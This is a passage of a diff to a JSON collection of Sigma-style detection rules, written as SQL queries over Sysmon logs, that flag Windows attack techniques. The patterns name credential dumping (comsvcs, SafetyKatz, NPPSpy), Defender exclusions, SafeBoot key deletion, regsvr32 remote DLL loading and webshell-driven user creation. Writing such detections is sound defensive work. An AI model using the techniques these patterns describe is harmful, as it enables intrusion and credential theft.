monitoring without shutting down the service completely", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1185" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrators might use this command to update Sysmon configuration." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-c%' ESCAPE '\\' OR CommandLine LIKE '%/c%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" + "filename": "proc_creation_win_sysinternals_sysmon_config_update.yml" }, { - "title": "Launch-VsDevShell.PS1 Proxy Execution", - "id": "45d3a03d-f441-458c-8883-df101a3bb146", + "title": "SafeBoot Registry Key Deleted Via Reg.EXE", + "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", "status": "experimental", - "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", + "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1216.001" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of the script by a developer" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Launch-VsDevShell.ps1%' ESCAPE '\\' AND (CommandLine LIKE '%VsWherePath %' ESCAPE '\\' OR CommandLine LIKE '%VsInstallationPath %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml" + "filename": "proc_creation_win_reg_delete_safeboot.yml" }, { - "title": "Suspicious MSDT Parent Process", - "id": "7a74da6b-ea76-47db-92cc-874ad90df734", + "title": "HackTool - SafetyKatz Execution", + "id": "b1876533-4ed5-4a83-90f3-b8645840a413", "status": "experimental", - "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", - "author": "Nextron Systems", + "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" ], - "filename": "proc_creation_win_msdt_susp_parent.yml" + "filename": "proc_creation_win_hktl_safetykatz.yml" }, { - "title": "Suspicious PowerShell IEX Execution Patterns", - "id": "09576804-7a05-458e-a817-eb718ca91f54", - "status": "experimental", - "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "title": "PowerShell Base64 Encoded FromBase64String Cmdlet", + "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "status": "test", + "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.execution", + "attack.t1059.001" + ], "falsepositives": [ - "Legitimate scripts that use IEX" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_iex_patterns.yml" + "filename": "proc_creation_win_powershell_base64_frombase64string.yml" }, { - "title": "Execute Code with Pester.bat as Parent", - "id": "18988e1b-9087-4f8a-82fe-0414dce49878", + "title": "JSC Convert Javascript To Executable", + "id": "52788a70-f1da-40dd-8fbd-73b5865d6568", "status": "experimental", - "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1216" + "attack.t1127" ], "falsepositives": [ - "Legitimate use of Pester for writing tests for Powershell scripts and modules" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%\\\\WindowsPowerShell\\\\Modules\\\\Pester\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%{ Invoke-Pester -EnableExit ;%' ESCAPE '\\' OR ParentCommandLine LIKE '%{ Get-Help \"%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\jsc.exe' ESCAPE '\\' AND CommandLine LIKE '%.js%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pester.yml" + "filename": "proc_creation_win_lolbin_jsc.yml" }, { - "title": "Powershell Defender Exclusion", - "id": "17769c90-230e-488b-a463-e05c08e9d48f", - "status": "experimental", - "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", - "author": "Florian Roth (Nextron Systems)", + "title": "Filter Driver Unloaded Via Fltmc.EXE", + "id": "4931188c-178e-4ee7-a348-39e8a7a56821", + "status": "test", + "description": "Detect filter driver unloading activity via fltmc.exe", + "author": "Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ - "Possible Admin Activity", - "Other Cmdlets that may use the same parameters" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-MpPreference %' ESCAPE '\\' OR CommandLine LIKE '%Set-MpPreference %' ESCAPE '\\') AND (CommandLine LIKE '% -ExclusionPath %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionExtension %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionProcess %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionIpAddress %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_defender_exclusion.yml" + "filename": "proc_creation_win_fltmc_unload_driver.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", - "id": "55f0a3a1-846e-40eb-8273-677371b8d912", - "status": "test", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", + "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "status": "experimental", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Other legitimate network providers used and not filtred in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "proc_creation_win_registry_new_network_provider.yml" }, { - "title": "Suspicious Registry Modification From ADS Via Regini.EXE", - "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "title": "PUA - NSudo Execution", + "id": "771d1eb5-9587-4568-95fb-9ec44153a012", "status": "experimental", - "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", - "author": "Eli Salem, Sander Wiebing, oscd.community", + "description": "Detects the use of NSudo tool for command execution", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regini_ads.yml" + "filename": "proc_creation_win_pua_nsudo.yml" }, { - "title": "Sysprep on AppData Folder", - "id": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", + "title": "Suspicious Query of MachineGUID", + "id": "f5240972-3938-4e56-8e4b-e33893176c1f", "status": "test", - "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", - "author": "Florian Roth (Nextron Systems)", + "description": "Use of reg to get MachineGuid information", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1082" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sysprep.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Cryptography%' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%MachineGuid%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysprep_appdata.yml" + "filename": "proc_creation_win_reg_machineguid.yml" }, { - "title": "UAC Bypass Using DismHost", - "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", - "status": "test", - "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Regsvr32 HTTP IP Pattern", + "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", + "status": "experimental", + "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218.010" ], "falsepositives": [ - "Unknown" + "FQDNs that start with a number" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_dismhost.yml" + "filename": "proc_creation_win_regsvr32_http_pattern.yml" }, { - "title": "Service Security Descriptor Tampering Via Sc.EXE", - "id": "98c5aeef-32d5-492f-b174-64a691896d25", + "title": "Unusual Child Process of dns.exe", + "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", "status": "experimental", - "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND CommandLine LIKE '%sdset%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_modification.yml" + "filename": "proc_creation_win_dns_susp_child_process.yml" }, { - "title": "Suspicious Execution Of PDQDeployRunner", - "id": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", + "title": "PUA- IOX Tunneling Tool Execution", + "id": "d7654f02-e04b-4934-9838-65c46f187ebc", "status": "experimental", - "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Legitimate use of the PDQDeploy tool to execute these commands" + "Legitimate use" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%PDQDeployRunner-%' ESCAPE '\\' AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\csc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\') OR (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -encodedcommand %' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% -w hidden%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" ], - "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml" + "filename": "proc_creation_win_pua_iox.yml" }, { - "title": "Suspicious Network Command", - "id": "a29c1813-ab1f-4dde-b489-330b952e91ae", + "title": "MERCURY APT Activity", + "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "description": "Detects suspicious command line patterns seen being used by MERCURY APT", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1016" + "attack.execution", + "attack.t1059.001", + "attack.g0069" ], "falsepositives": [ - "Administrator, hotline ask to user" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' OR CommandLine LIKE '%netsh interface show interface%' ESCAPE '\\' OR CommandLine LIKE '%arp -a%' ESCAPE '\\' OR CommandLine LIKE '%nbtstat -n%' ESCAPE '\\' OR CommandLine LIKE '%net config%' ESCAPE '\\' OR CommandLine LIKE '%route print%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_network_command.yml" + "filename": "proc_creation_win_apt_mercury.yml" }, { - "title": "Use of Adplus.exe", - "id": "2f869d59-7f6a-4931-992c-cce556ff2d53", - "status": "experimental", - "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Custom Class Execution via Xwizard", + "id": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", + "status": "test", + "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1003.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate usage of Adplus" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\adplus.exe' ESCAPE '\\' OR OriginalFileName = 'Adplus.exe') AND (CommandLine LIKE '% -hang %' ESCAPE '\\' OR CommandLine LIKE '% -pn %' ESCAPE '\\' OR CommandLine LIKE '% -pmn %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -po %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -sc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND CommandLine REGEXP '\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}')" ], - "filename": "proc_creation_win_lolbin_adplus.yml" + "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml" }, { - "title": "Execution in Webserver Root Folder", - "id": "35efb964-e6a5-47ad-bbcd-19661854018d", - "status": "test", - "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", + "title": "Webshell Hacking Activity Patterns", + "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "status": "experimental", + "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1505.003" + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Various applications", - "Tools that include ping or nslookup command invocations" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wwwroot\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\wmpub\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\htdocs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE '%bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Tools\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SMSComponent\\\\%' ESCAPE '\\') AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR 